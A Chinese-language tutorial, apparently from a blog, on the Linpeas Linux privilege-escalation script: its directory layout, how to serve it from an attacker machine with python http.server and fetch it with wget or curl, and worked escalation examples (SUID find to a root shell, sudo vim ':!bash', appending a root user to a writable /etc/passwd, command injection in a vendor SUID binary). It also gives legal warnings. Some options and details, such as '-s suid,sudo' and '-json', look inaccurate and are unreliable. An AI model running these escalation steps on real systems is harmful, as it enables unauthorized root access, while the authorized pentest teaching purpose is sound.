当前位置: 首页 > article >正文

Linpeas使用教程

在Kali Linux的权限提升工具库中LinpeasLinux Privilege Escalation Awesome Script是一款专注于Linux系统本地权限提升的自动化脚本工具隶属于“PEASSPrivilege Escalation Awesome Scripts SUITE”套件。它通过全面扫描目标Linux系统的配置漏洞、权限缺陷、敏感文件、进程信息等自动识别可用于权限提升的攻击路径如SUID文件滥用、sudo权限漏洞、内核漏洞并以高亮、可视化的方式输出结果帮助渗透测试人员快速定位权限提升突破口。本文将从工具概述、核心功能、目录结构解析、使用教程及注意事项等方面对Linpeas进行全面详细的介绍。一、Linpeas工具概述1. 工具定义Linpeas是一款开源的Linux本地权限提升自动化扫描脚本核心定位是“Linux权限提升漏洞扫描与攻击路径识别工具”。它的工作原理是通过数百条预定义的检测规则对目标系统的用户权限、文件权限、系统配置、进程状态、内核版本、环境变量等维度进行全面扫描筛选出可能导致权限提升的安全缺陷如具有SUID权限的危险命令、可写的系统配置文件、sudo免密码执行的命令并结合内置的漏洞数据库如CVE漏洞库、内核漏洞库标注出可利用的漏洞及对应的利用方法最终生成结构化的扫描报告降低权限提升的技术门槛。2. 开发背景与目标Linux本地权限提升是渗透测试后渗透阶段的核心难点之一传统手动排查需逐一检查系统配置如/etc/sudoers文件、SUID文件列表、内核版本效率低下且易遗漏关键漏洞同时不同Linux发行版如Ubuntu、CentOS、Debian的配置差异大手动适配检测规则难度高。Linpeas的开发目标正是解决这些痛点通过自动化扫描替代手动操作覆盖95%以上的Linux权限提升场景支持多架构、多发行版系统为测试人员提供“一键扫描、直观定位、快速利用”的权限提升解决方案大幅缩短权限提升的时间成本。3. 主要特点全面的扫描覆盖支持15类权限提升场景的检测包括SUID/SGID文件滥用、sudo权限漏洞、可写系统文件如/etc/passwd、环境变量劫持、计划任务cron配置缺陷、内核漏洞如Dirty COW、Docker权限滥用、SSH密钥泄露等覆盖绝大多数Linux权限提升路径。自动化与智能化无需人工干预执行脚本后自动完成全维度扫描内置智能分析逻辑可根据扫描结果优先级排序高危漏洞标红、中危标黄并标注利用难度与参考链接如Exploit-DB漏洞利用代码地址直观引导测试人员。多架构与多发行版兼容提供多种架构的可执行文件386、amd64、arm、arm64与Shell脚本版本支持Linux 3.x内核的所有主流发行版Ubuntu、CentOS、Debian、RedHat、Kali同时兼容DarwinmacOS系统适配性极强。可视化输出与报告扫描结果采用彩色高亮格式高危漏洞红色、中危黄色、信息蓝色关键信息如可利用的SUID文件、sudo免密命令标红加粗便于快速识别支持输出为文本报告便于后续分析与报告编写。轻量与隐蔽性Shell脚本版本体积仅数十KB可通过wget、curl快速传输到目标系统扫描过程中资源占用低CPU使用率通常低于5%无明显异常进程避免触发目标系统的安全监控如IDS/IPS。实时更新漏洞库作为PEASS套件的核心组件Linpeas的漏洞检测规则与利用方法实时更新及时纳入新披露的Linux权限提升漏洞如CVE-2023-0386、CVE-2022-0847确保对新型漏洞的检测能力。4. 适用场景Linpeas主要适用于Linux系统渗透测试的后渗透阶段具体包括以下核心场景低权限Shell权限提升当获取目标系统的低权限Shell如www-data、普通用户权限后执行Linpeas扫描快速定位可用于提升至root权限的漏洞如SUID文件滥用、sudo配置缺陷。系统安全评估企业安全团队用于内部Linux服务器的权限安全评估检测系统是否存在权限配置漏洞、敏感文件泄露等问题提前修复安全隐患。渗透测试教学与学习供安全初学者学习Linux权限提升的原理与方法如SUID文件的利用逻辑、cron计划任务的配置缺陷通过扫描结果理解不同漏洞的触发条件与利用路径。多架构环境权限提升针对嵌入式Linux设备如arm架构的路由器、物联网设备或服务器amd64/386架构选择对应架构的Linpeas版本实现跨架构的权限提升扫描。二、Linpeas目录结构中文翻译与说明在Kali Linux中Linpeas隶属于PEASS套件默认安装路径为/usr/share/peass/linpeas目录包含适配不同架构的可执行文件与Shell脚本版本。以下是完整目录结构的中文翻译及详细功能说明表格英文文件名/目录中文翻译功能说明与适用场景/usr/share/peass/linpeasLinpeas主目录Linpeas工具的核心存储目录包含适配不同架构的可执行文件、Shell脚本及辅助文件是工具的“根路径”。linpeas_darwin_amd64DarwinmacOSamd64架构可执行文件适用于macOS系统Darwin内核的amd64架构64位Intel处理器可直接在macOS终端中执行实现macOS系统的权限提升扫描功能与Linux版本一致但适配macOS特有配置。linpeas_darwin_arm64DarwinmacOSarm64架构可执行文件适用于macOS系统的arm64架构64位Apple Silicon处理器如M1、M2芯片解决arm架构macOS设备的权限提升扫描需求。linpeas_fat.shLinpeas通用Shell脚本全功能版基于Bash编写的全功能Shell脚本兼容所有Linux架构无需区分386/amd64包含完整的扫描规则与漏洞检测逻辑无需编译可直接在目标系统中执行适合无法传输二进制文件的场景如目标系统禁止执行外来可执行文件。linpeas_linux_386Linux 386架构可执行文件适用于Linux系统的386架构32位x86处理器如老旧的32位Ubuntu、CentOS服务器二进制文件执行效率高于Shell脚本扫描速度更快。linpeas_linux_amd64Linux amd64架构可执行文件适用于Linux系统的amd64架构64位x86处理器是目前主流Linux服务器如阿里云、腾讯云服务器的默认架构执行效率最高支持所有高级扫描功能如内核漏洞实时匹配。linpeas_linux_armLinux arm架构可执行文件适用于Linux系统的arm架构32位ARM处理器如嵌入式设备路由器、智能设备、ARM架构开发板树莓派早期32位版本解决嵌入式Linux的权限提升扫描需求。linpeas_linux_arm64Linux arm64架构可执行文件适用于Linux系统的arm64架构64位ARM处理器如新型嵌入式设备、ARM架构云服务器AWS Graviton、阿里云ARM服务器适配64位ARM架构的高性能扫描需求。linpeas.shLinpeas标准Shell脚本基于Bash编写的标准Shell脚本功能与linpeas_fat.sh一致但体积更小约50KB扫描规则略有简化移除部分冷门场景检测适合网络带宽有限或需要快速传输的场景如目标系统仅允许小文件上传。linpeas_small.shLinpeas轻量Shell脚本Linpeas的轻量级Shell脚本版本体积仅约10KB保留核心扫描规则如SUID文件、sudo配置、可写系统文件移除高级功能如内核漏洞匹配、彩色输出适合目标系统环境受限的场景如Bash版本过低、禁止使用彩色输出。三、Linpeas完整使用教程Linpeas的核心使用流程为“选择适配版本→传输到目标系统→执行扫描→分析结果→利用漏洞提权”以下结合“amd64架构服务器扫描”“嵌入式arm设备扫描”两个高频场景详细介绍使用步骤1. 基础环境准备Kali Linux默认预装PEASS套件包含Linpeas无需额外安装。通过以下命令验证工具可用性并查看目录结构# 进入Linpeas主目录 cd /usr/share/peass/linpeas # 查看所有可用版本 ls -l # 输出linpeas_linux_amd64、linpeas.sh等文件说明资源完整 # 验证Shell脚本版本的可执行性 chmod x linpeas.sh # 赋予执行权限若未默认赋予 ./linpeas.sh -h # 查看帮助信息验证脚本正常可用若Kali未预装PEASS可通过以下命令安装sudo apt update sudo apt install peass或通过GitHub克隆最新版本获取实时更新的漏洞规则git clone https://github.com/carlospolop/PEASS-ng.git cd PEASS-ng/linpeas ls -l # 查看最新版本的Linpeas文件2. 场景1Linux amd64架构服务器权限提升扫描目标获取目标Linux服务器amd64架构如Ubuntu 22.04的低权限Shellwww-data用户通过Linpeas的amd64可执行文件扫描定位权限提升漏洞并提升至root权限。步骤1选择并传输Linpeas版本目标为amd64架构优先选择二进制可执行文件linpeas_linux_amd64执行效率高通过以下方式传输到目标系统方法1攻击机开启HTTP服务目标系统下载# 1. 在Kali攻击机中进入Linpeas目录开启Python HTTP服务端口8080 cd /usr/share/peass/linpeas python3 -m http.server 8080 # 2. 在目标系统的低权限Shell中使用wget下载Linpeas wget http://攻击机IP:8080/linpeas_linux_amd64 -O /tmp/linpeas # 保存到/tmp目录通常所有用户可写方法2通过SCP传输若目标开启SSH服务# 在Kali攻击机中通过SCP将Linpeas传输到目标系统的/tmp目录 scp /usr/share/peass/linpeas/linpeas_linux_amd64 目标用户名目标IP:/tmp/linpeas步骤2赋予执行权限并执行扫描在目标系统的低权限Shell中赋予Linpeas执行权限并执行扫描# 进入/tmp目录赋予执行权限 cd /tmp chmod x linpeas # 执行扫描输出结果到报告文件便于后续分析 ./linpeas linpeas_report.txt # 扫描结果同时输出到终端与linpeas_report.txt文件扫描过程中终端会以彩色高亮格式输出实时结果高危漏洞标红、中危标黄扫描时间通常为1-3分钟取决于目标系统配置复杂度。步骤3分析扫描结果定位权限提升漏洞扫描完成后通过以下方式分析结果查看关键标红信息Linpeas会将高危漏洞结果标红并标注“[!]”例如# 示例1发现具有SUID权限的危险命令可用于提权 [!] SUID - Check easy privesc, exploits and write perms -rwsr-xr-x 1 root root 123456 Jul 10 2023 /usr/bin/find # find命令具有SUID权限可通过find的-exec参数执行root命令 # 示例2发现sudo免密码执行命令当前用户可免密执行root权限的vim [!] Sudo - Check if sudo can be used without password www-data ALL(ALL) NOPASSWD: /usr/bin/vim # www-data用户可免密执行vim通过vim的:!命令执行root命令查看内核漏洞匹配结果Linpeas会根据目标内核版本匹配可利用的内核漏洞例如[!] Kernel - Possible kernel exploits Kernel version: 5.4.0-100-generic # 目标内核版本 Possible exploits: - CVE-2022-0847 (Dirty Pipe) - Exploit-DB: 50808 # 可利用Dirty Pipe漏洞提权提供Exploit-DB链接查看可写系统文件若发现/etc/passwd等关键系统文件可写可直接添加root权限用户[!] Writeable /etc/passwd - Possible to add root user -rw-rw-rw- 1 root root 1234 Aug 27 2025 /etc/passwd # /etc/passwd文件所有用户可写步骤4利用漏洞提升权限根据扫描结果选择对应的利用方法提升权限以下是常见漏洞的利用示例示例1SUID文件find提权# 利用find的SUID权限执行whoami命令以root权限运行 find /tmp -name test -exec whoami \; # 输出root说明提权成功 # 进一步获取root Shell find /tmp -name test -exec /bin/bash \; # 进入root权限的bash Shell示例2sudo免密vim提权# 免密执行vim通过vim的:!命令执行bash获取root Shell sudo vim :!bash # 在vim中执行bash进入root权限Shell whoami # 输出root示例3可写/etc/passwd提权# 1. 生成加密的root密码在Kali攻击机中 openssl passwd -1 新密码 # 输出加密后的密码如$1$abc123$def456... # 2. 在目标系统中添加root权限用户到/etc/passwd echo hack:$1$abc123$def456...:0:0:root:/root:/bin/bash /etc/passwd # 3. 切换到hack用户获取root权限 su hack # 输入新密码成功切换后为root权限 whoami # 输出root3. 场景2Linux arm架构嵌入式设备权限提升扫描目标获取arm架构嵌入式设备如路由器、智能摄像头的低权限Shell通过Linpeas的arm版本扫描定位权限提升漏洞。步骤1确认目标架构选择适配版本在目标嵌入式设备的Shell中通过以下命令确认架构uname -m # 输出armv7l说明为arm架构32位选择linpeas_linux_arm版本arm架构32位通过HTTP服务传输到目标设备# 1. Kali攻击机开启HTTP服务提供linpeas_linux_arm cd /usr/share/peass/linpeas python3 -m http.server 8080 # 2. 目标嵌入式设备下载Linpeas若目标无wget可使用curl curl http://攻击机IP:8080/linpeas_linux_arm -o /tmp/linpeas步骤2处理嵌入式设备的环境限制嵌入式设备通常存在环境限制如Bash版本过低、缺少库文件若二进制版本无法执行可改用轻量Shell脚本版本linpeas_small.sh# 1. 攻击机提供linpeas_small.sh cp /usr/share/peass/linpeas/linpeas_small.sh . python3 -m http.server 8080 # 2. 目标设备下载并执行Shell脚本 curl http://攻击机IP:8080/linpeas_small.sh -o /tmp/linpeas.sh chmod x /tmp/linpeas.sh sh /tmp/linpeas.sh # 嵌入式设备可能仅支持sh而非bash步骤3分析扫描结果利用嵌入式设备特有漏洞嵌入式设备常见的权限提升漏洞包括“可写的固件配置文件”“厂商自定义SUID工具”“老旧内核漏洞”例如扫描结果可能显示[!] Custom SUID Tools - Vendor-specific SUID binaries -rwsr-xr-x 1 root root 45678 Sep 01 2023 /usr/bin/vendor_tool # 厂商自定义SUID工具可能存在命令注入漏洞进一步测试该工具是否存在命令注入# 测试vendor_tool是否支持命令注入 /usr/bin/vendor_tool test; whoami # 若输出root说明存在命令注入可直接提权 /usr/bin/vendor_tool test; /bin/sh # 获取root Shell4. 关键补充高级扫描选项与结果优化1使用高级扫描选项Linpeas支持多种高级选项可根据需求调整扫描范围与输出格式# 1. 快速扫描仅扫描核心场景耗时约30秒 ./linpeas -q # -q快速模式 # 2. 禁用彩色输出适合目标系统不支持彩色的场景 ./linpeas -nc # -ncNo Color # 3. 扫描特定场景如仅扫描SUID文件与sudo配置 ./linpeas -s suid,sudo # -s指定扫描场景suid、sudo、cron、kernel等 # 4. 输出JSON格式报告便于自动化分析 ./linpeas -json linpeas_report.json # -jsonJSON格式输出2结果筛选与重点查看扫描报告通常包含大量信息可通过以下命令快速筛选关键结果# 1. 查看所有标红的高危漏洞包含[!]的行 grep -n \[!\] linpeas_report.txt # -n显示行号便于定位 # 2. 查看SUID文件相关结果 grep -A 10 -B 2 SUID - Check easy privesc linpeas_report.txt # -A显示匹配行后10行-B显示前2行 # 3. 查看内核漏洞相关结果 grep -i kernel exploit linpeas_report.txt # -i忽略大小写四、使用Linpeas的注意事项严格遵守合法授权Linpeas是“高风险权限提升工具”仅可用于对“已获得明确书面授权”的Linux系统进行测试。未经授权使用Linpeas扫描他人系统、获取root权限可能违反《中华人民共和国网络安全法》《刑法》第285条非法侵入计算机信息系统罪、第286条破坏计算机信息系统罪将承担刑事责任。区分测试环境与生产环境优先在“测试环境”如企业内部的测试服务器、虚拟机中使用Linpeas避免在“生产环境”如对外业务服务器、核心数据库服务器中直接执行扫描——生产环境的权限提升操作可能导致服务中断、数据损坏且部分漏洞利用如内核漏洞可能引发系统崩溃。若需测试生产环境必须提前与业务方沟通明确测试时间窗口如深夜低峰期、回滚方案如系统快照测试完成后立即清理扫描痕迹如删除/tmp目录的Linpeas文件与报告恢复目标系统至正常状态。注意目标系统环境限制部分Linux系统可能禁用/tmp目录的执行权限通过noexec挂载选项导致Linpeas无法执行此时需将Linpeas传输到其他可执行目录如用户家目录~/或通过以下命令临时移除/tmp的noexec限制mount -o remount,rw,exec /tmp # 需root权限若低权限用户无法执行需更换目录嵌入式设备或极简Linux系统可能缺少核心命令如grep、awk导致Shell脚本版本的Linpeas无法正常运行此时需选择对应的二进制版本如arm架构的linpeas_linux_arm或手动补充缺失的命令如通过busybox提供基础命令。避免扫描结果泄露Linpeas扫描报告包含目标系统的敏感信息如用户列表、sudo配置、内核版本、敏感文件路径测试完成后需立即删除目标系统中的报告文件如rm /tmp/linpeas_report.txt避免被他人获取导致信息泄露。不得将扫描报告用于测试以外的用途如传播目标系统的安全缺陷、出售敏感信息需严格遵守信息安全伦理与保密协议。结合手动验证与漏洞利用Linpeas仅提供“漏洞检测与路径提示”部分扫描结果可能存在误报如标记为可利用的SUID文件实际无法提权需手动验证漏洞的真实性如测试SUID文件是否支持-exec参数、sudo命令是否真的免密执行。对于内核漏洞Linpeas提供的Exploit-DB链接可能包含多个利用代码版本需根据目标系统的内核版本、发行版选择适配的利用代码避免因版本不兼容导致利用失败或系统崩溃。定期更新Linpeas版本Linux权限提升漏洞持续披露如每月新增多个CVE漏洞需定期更新Linpeas的漏洞检测规则确保对新型漏洞的检测能力# 通过GitHub更新最新版本 git clone https://github.com/carlospolop/PEASS-ng.git cd PEASS-ng/linpeas chmod x linpeas_linux_amd64 # 使用最新版本的二进制文件关注Linpeas的官方GitHub仓库https://github.com/carlospolop/PEASS-ng及时获取新漏洞的检测规则与利用方法更新。五、总结Linpeas作为Linux本地权限提升的自动化工具标杆凭借“全面的扫描覆盖、自动化分析、多架构兼容”的核心优势成为渗透测试人员在后渗透阶段的必备工具。它不仅解决了传统手动排查“效率低、易遗漏”的痛点还通过可视化输出与漏洞利用引导降低了权限提升的技术门槛帮助测试人员快速突破低权限限制获取目标系统的完全控制。然而工具的强大功能也伴随着极高的法律与伦理风险。在使用Linpeas时必须始终以“合法授权”为前提严格区分测试环境与生产环境避免对目标系统造成负面影响同时需深入理解权限提升的原理与漏洞利用逻辑结合手动验证优化扫描结果确保权限提升的成功率与安全性。通过合理、合规地使用Linpeas不仅能提升Linux渗透测试的技术水平更能帮助企业认识本地权限配置的安全缺陷完善系统安全防护体系如限制SUID文件权限、规范sudo配置、及时更新内核补丁构建更安全的Linux运行环境。

相关文章:

Linpeas使用教程

在Kali Linux的权限提升工具库中,Linpeas(Linux Privilege Escalation Awesome Script)是一款专注于Linux系统本地权限提升的自动化脚本工具,隶属于“PEASS(Privilege Escalation Awesome Scripts SUITE)”…...

思博伦TCL并发测试避坑指南:HTTP/1.1配置与端口关联的最佳实践

思博伦TCL并发测试避坑指南:HTTP/1.1配置与端口关联的最佳实践 在性能测试领域,思博伦(Spirent)的TCL测试工具因其强大的功能和灵活性而备受推崇。然而,正是这种灵活性也带来了配置上的复杂性,特别是在HTTP…...

PEASS使用教程

在Kali Linux的权限提升工具生态中,PEASS(Privilege Escalation Awesome Scripts SUITE,权限提升优秀脚本套件)是一款覆盖Linux与Windows双平台的自动化权限提升扫描工具集。它通过整合Linpeas(Linux平台)与…...

winpeas使用教程

winpeas是PEASS(Privilege Escalation Awesome Scripts SUITE,权限提升优秀脚本套件)中的Windows平台专用模块,全称为Windows Privilege Escalation Awesome Script。它是一款专为Windows系统设计的自动化权限提升扫描工具&#x…...

Lynis使用教程

在Kali Linux的系统安全审计工具库中,Lynis是一款开源、跨平台的自动化安全审计工具,核心定位是“Linux/Unix系统深度安全扫描与合规性检查工具”。它通过对系统内核、软件配置、用户权限、服务状态、日志策略等维度进行全面检测,识别潜在的安…...

全球近7.6万台WatchGuard Firebox设备暴露高危漏洞CVE-2025-9242,远程攻击者无需认证即可执行代码

全球约有7.6万台WatchGuard Firebox网络安全设备暴露在公网上,且尚未修复高危漏洞CVE-2025-9242。远程攻击者无需任何身份验证,即可利用该漏洞执行恶意代码,风险极高。 WatchGuard Firebox T145 Network Security/Firewall Appliance - WGT14…...

数电小白必看:最小项在逻辑函数中的神奇作用(附实例解析)

数电小白必看:最小项在逻辑函数中的神奇作用(附实例解析) 数字电路设计就像搭积木,而最小项就是其中最基础的"乐高颗粒"。想象一下,你正在设计一个智能家居控制系统——如何用最简洁的逻辑实现"当有人移…...

PCL Viewer隐藏功能揭秘:利用ALT组合键实现立体显示和窗口管理的进阶技巧

PCL Viewer隐藏功能揭秘:利用ALT组合键实现立体显示和窗口管理的进阶技巧 在三维点云数据处理领域,PCL Viewer作为Point Cloud Library的标准可视化工具,其基础功能已被广泛使用。然而,许多用户仅停留在简单的视图旋转和缩放操作上…...

LM1875功放DIY避坑指南:从看懂官方电路图到解决自激发热(附元件选择心得)

LM1875功放DIY实战手册:从电路设计到疑难排解全攻略 每次打开音响,那种温暖而有力的声音总能瞬间填满整个房间。作为DIY爱好者,亲手打造一台属于自己的功放不仅是技术的挑战,更是一种独特的成就感。LM1875这颗经典的音频功放芯片&…...

arcgis-利用融合与排序工具高效提取图斑面积最大属性值

1. 为什么需要提取图斑面积最大属性值 在GIS数据处理中,经常会遇到这样的需求:我们需要从复杂的图斑数据中找出每个区域占面积最大的属性值。比如在国土调查中,一个地块可能包含多种房屋质量等别,但我们需要确定该地块最主要的房…...

AI原生A/B测试框架设计实战(从LLM服务灰度到多模态策略归因):Meta/Netflix/阿里内部验证的7层隔离架构首次公开

第一章:AI原生A/B测试框架的核心范式演进 2026奇点智能技术大会(https://ml-summit.org) 传统A/B测试以静态页面与确定性分流为基石,而AI原生框架将实验设计、流量分配、指标归因与模型反馈深度耦合,形成闭环自适应系统。其核心范式从“假设…...

雨课堂英语听说期末考后复盘:那些容易丢分的听力填空长难句怎么破?(附2024.12真题片段分析)

破解英语听力填空长难句:从真题分析到精听实战 刚走出考场的你,是否对听力填空题里那些"听懂了却填不对"的长难句耿耿于怀?当录音中闪过"physicial active"、"two times as much water"这类复杂表达时&#xf…...

Arduino nRF5x低功耗库:深度解析SYSTEM_OFF与CONSTANT_LATENCY模式

1. 项目概述 Arduino nRF5x_lowPower 是专为 Nordic Semiconductor nRF5x 系列 SoC(如 nRF52832、nRF52840、nRF51822)设计的 Arduino 兼容低功耗管理库。它并非简单封装睡眠函数,而是深度对接 nRF5x 片上电源管理单元(PMU&…...

STM32 UDS Bootloader完整方案:简化学习ISO15765与ISO14429协...

uds bootloader stm32 完整方案 iso15765 iso14429 简化学习难度 需要可以加好友。 下载42k速度在15秒左右 第二版上位机:模仿vector vflash 设计简洁高效,下载速度提高到11k byte/s。01-firmware :包含stm32 boot 软件 设备驱动 应用程序 02-上位机 &#xf…...

如何告别网盘限速:八大平台直链下载助手完全指南

如何告别网盘限速:八大平台直链下载助手完全指南 【免费下载链接】Online-disk-direct-link-download-assistant 一个基于 JavaScript 的网盘文件下载地址获取工具。基于【网盘直链下载助手】修改 ,支持 百度网盘 / 阿里云盘 / 中国移动云盘 / 天翼云盘 …...

磁珠在电源端必须加电容?一个容易被忽略的EMI设计细节与避坑指南

磁珠在电源端必须加电容?一个容易被忽略的EMI设计细节与避坑指南 在高速电路设计中,电磁干扰(EMI)问题往往成为工程师的噩梦。特别是当电路板上集成了Camera模块、RF收发器或其他敏感模拟电路时,电源线上的噪声就像隐形…...

Windows 系统 Allure 环境变量(PATH)配置完整教程

🔑 前置准备 先确认你已经下载并解压了 Allure 工具,找到它的 bin 目录路径(比如 D:\tools\allure-2.30.0\bin,路径里绝对不能有中文、空格、特殊符号) 确认 bin 目录里有 allure.bat 和 allure.exe 这两个文件 已经安装好 Java 8+ 环境(java -version 能正常输出版本号…...

pytest 在 main 函数中执行测试用例的 3 种常用方法

在 Python 脚本的 if __name__ == __main__: 主函数中调用 pytest,可以直接运行测试用例,无需手动敲命令行,非常适合 IDE 直接运行、自动化脚本集成。 下面给你最实用、可直接复制的写法: 方法 1:最简写法(执行当前文件所有用例) python 运行 import pytest# 测试用…...

pytest.ini 中 addopts 详解 多插件配置方法

addopts = --html=report.html --self-contained-html 一、addopts 到底是什么? addopts 是 pytest.ini 配置文件中 [pytest] 节下的核心配置项,全称是 additional options(附加选项)。它的作用是:把你每次执行 pytest 命令时都要手动加的命令行参数,永久写在配置文件里…...

pytest -mark

pytest.mark 是 pytest 核心功能,用于给测试函数 / 类打标签,实现分类、筛选、条件执行、参数化等。常用 @pytest.mark.xxx 装饰器 + 命令行 -m 筛选。 一、常用内置标记 1. skip /skipif:跳过测试 python 运行 import pytest import sys@pytest.mark.skip(reason="…...

SparkFun MetaWatch Arduino库深度解析:蓝牙SPP嵌入式控制

1. SparkFun MetaWatch Arduino库深度解析:蓝牙智能手表的嵌入式控制实践1.1 项目背景与工程定位MetaWatch 是2013年前后推出的早期开源智能手表平台,其核心价值在于完全开放的硬件设计与通信协议。SparkFun 推出的SFE_MetaWatchArduino 库并非通用蓝牙协…...

别再踩坑了!SQL Server数据类型那点事儿,看懂这篇少背三个锅没

从0构建WAV文件:读懂计算机文件的本质 虽然接触计算机有一段时间了,但是我的视野一直局限于一个较小的范围之内,往往只能看到于算法竞赛相关的内容,计算机各种文件在我看来十分复杂,认为构建他们并能达到目的是一件困难…...

ArduMotor:跨平台电机驱动抽象库设计与实现

1. ArduMotor库概述:面向Arduino与KL46Z平台的电机驱动抽象层ArduMotor是一个专为嵌入式电机控制设计的轻量级C库,核心目标是为Arduino兼容平台(如UNO、Nano)及NXP FRDM-KL46Z开发板提供统一、可移植的电机驱动接口。其底层硬件抽…...

ESP8266红外MQTT网关:基于Homie协议的轻量级IoT封装

1. 项目概述simple-homie-iot-ir是一个面向 ESP8266 平台(亦可适配 ESP32)的轻量级嵌入式 IoT 封装库,其核心定位并非从零实现 Homie 规范,而是作为homie-iotESP 库的简化抽象层,专为红外(IR)设…...

2026奇点智能技术大会前瞻(仅限首批参会者解密的8项AI-Native Data Stack技术白皮书)

第一章:2026奇点智能技术大会:AI原生大数据处理 2026奇点智能技术大会(https://ml-summit.org) 本届大会首次定义“AI原生大数据处理”范式——数据不再经由传统ETL管道预处理后喂给模型,而是以流式、语义化、向量化形态直接进入推理与训练…...

CISSP域3知识点 安全工程基础

🏗️ CISSP 域3安全工程基础丨把安全"建"进系统里Domain 3 安全架构与工程 OSG第十版第8章核心内容 占域3(13%总权重)30%以上,概念题场景题双高频 这一块是整个 CISSP 的理论地基,不搞透,后面很…...

效率神器!命令行终端优化(Zsh, iTerm2)

效率神器!命令行终端优化(Zsh, iTerm2) 对于开发者和技术爱好者来说,命令行终端是日常工作中不可或缺的工具。默认的终端配置往往功能有限,操作效率低下。通过优化终端环境,比如使用Zsh和iTerm2&#xff0…...

AI模型签名+SBOM+运行时策略绑定:SITS2026现场演示12分钟构建合规可信AI交付单元

第一章:SITS2026演讲:AI原生DevSecOps实践 2026奇点智能技术大会(https://ml-summit.org) 在SITS2026主会场,来自全球头部云原生安全团队的联合实践展示了如何将大语言模型(LLM)与策略即代码(Policy-as-C…...

避坑指南:在Ubuntu 20.04上编译安装GTSAM 4.2并运行因子图示例

深度避坑指南:Ubuntu 20.04下GTSAM 4.2编译安装与因子图实战全解析 当你在Ubuntu 20.04上尝试编译安装GTSAM 4.2时,是否遇到过Python绑定失败、CMake参数配置错误或是依赖版本冲突的困扰?作为机器人感知和SLAM领域的重要工具库,GT…...

从零开始:ArcGIS Pro二次开发环境搭建与首个模块加载项实战

1. 环境准备:从零搭建ArcGIS Pro开发环境 第一次接触ArcGIS Pro二次开发时,我花了整整两天时间才把环境配置好。现在回想起来,其实只要抓住几个关键点就能避开那些坑。首先需要确认的是软件版本匹配问题——这是新手最容易翻车的地方。根据我…...